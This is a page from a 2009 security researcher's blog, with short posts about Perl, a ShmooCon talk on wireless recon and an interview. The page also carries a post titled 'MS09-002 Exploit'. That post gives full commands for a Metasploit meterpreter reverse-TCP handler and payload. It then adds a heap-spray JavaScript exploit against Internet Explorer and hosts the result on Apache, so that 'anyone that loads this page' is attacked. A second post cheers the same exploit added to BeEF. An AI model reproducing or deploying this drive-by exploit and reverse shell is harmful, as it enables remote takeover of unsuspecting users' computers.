Song that encompasses my thoughts on Perl 
Sunday, February 22, 2009, 11:55 PM
For those of you that know me, chatted with me in IRC, met me at a con, I'm sure you will agree with me on this:

http://www.youtube.com/watch?v=Fcd3XuQwDQQ

Perl FTW!

Regards,
Jabra
[ 2 comments ] ( 31 views ) [ 0 trackbacks ] permalink ( 3 / 25 )
BeEF, now with MS09-002 goodness!! 
Saturday, February 21, 2009, 02:46 AM
http://www.bindshell.net/entry/50

Enough said. Happy 0wnage!

Regards,
Jabra


[ 1 comment ] ( 16 views ) [ 0 trackbacks ] permalink ( 3 / 42 )
MS09-002 Exploit 
Thursday, February 19, 2009, 08:47 PM
If you were at ShmooCon, you may have heard the following phrase a few times, "Lets pop a box".

Okay, sure why not. So there was a recent IE vulnerability released with an exploit on milworm.

First, Metasploit with Meterpreter on the attack box 192.168.1.50: 

./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 443
exploit -j
(Note, 192.168.1.50 is the attack system, that will receive the connection back.)

We will be attacking anyone that loads this page.

Initial setup: 

echo '<html>  <script language="JavaScript">' > ms09-002.html

Now setting up the Metasploit payload:

./msfpayload windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=443 J | ./payloadproper.pl >> ms09-002.html
Append the milworm exploit to the end of the file.

http://milw0rm.org/exploits/8077

echo '
var array = new Array(); 
var ls = 0x100000-(c.length*2+0x01020); 
var b = unescape("%u0C0C%u0C0C"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 
for(j=0; j<0xC0; j++) { 
	array[j] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() { 
  o1=document.createElement("tbody"); 
  o1.click; 
  var o2 = o1.cloneNode();	
  o1.clearAttributes(); 
  o1=null; CollectGarbage(); 
  for(var x=0;x<a1.length;x++) a1[x].src=s1; 
  o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
</html>' >> ms09-002.html
Time to start Apache and copy the attack to the webroot.

sudo /etc/init.d/apache2 start
sudo cp ms09-002.html /var/www
sudo chmod 755 /var/www/ms09-002.html
Okay, just get a client to open ms09-002.html and enjoy!!!!!!!

See everyone in Orlando at Infosec World. More details to come later.

-Jabra


[ 7 comments ] ( 170 views ) [ 0 trackbacks ] permalink ( 2.8 / 64 )
Hak5 Interview at ShmooCon 2009 
Saturday, February 14, 2009, 01:41 PM
http://www.hak5.org/episodes/episode-426

http://www.youtube.com/watch?v=srI8QI7DKiU

The interview with me starts at the 8th minute. I talk about the wireless visualization software I released at ShmooCon called GISKismet.

Thanks again to Mister_X for helping out with the domain!

Regards,
Jabra
[ add comment ] ( 1 view ) [ 0 trackbacks ] permalink ( 2.9 / 47 )
ShmooCon 2009 Slides - Next Generation Wireless Recon, Visualizing The Airwaves 
Monday, February 9, 2009, 08:44 PM
Here are the slides from our talk at ShmooCon 2009:

Abraham-Smith-ShmooCon2009

It was great to meet everyone. Please send me comments and suggestions or post tickets at http://www.giskismet.org

I'm looking forward to getting more feedback on ways to improve the software.

Regards,
Jabra
[ 1 comment ] ( 11 views ) [ 0 trackbacks ] permalink ( 2.8 / 33 )

<<First <Back | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | Next> Last>>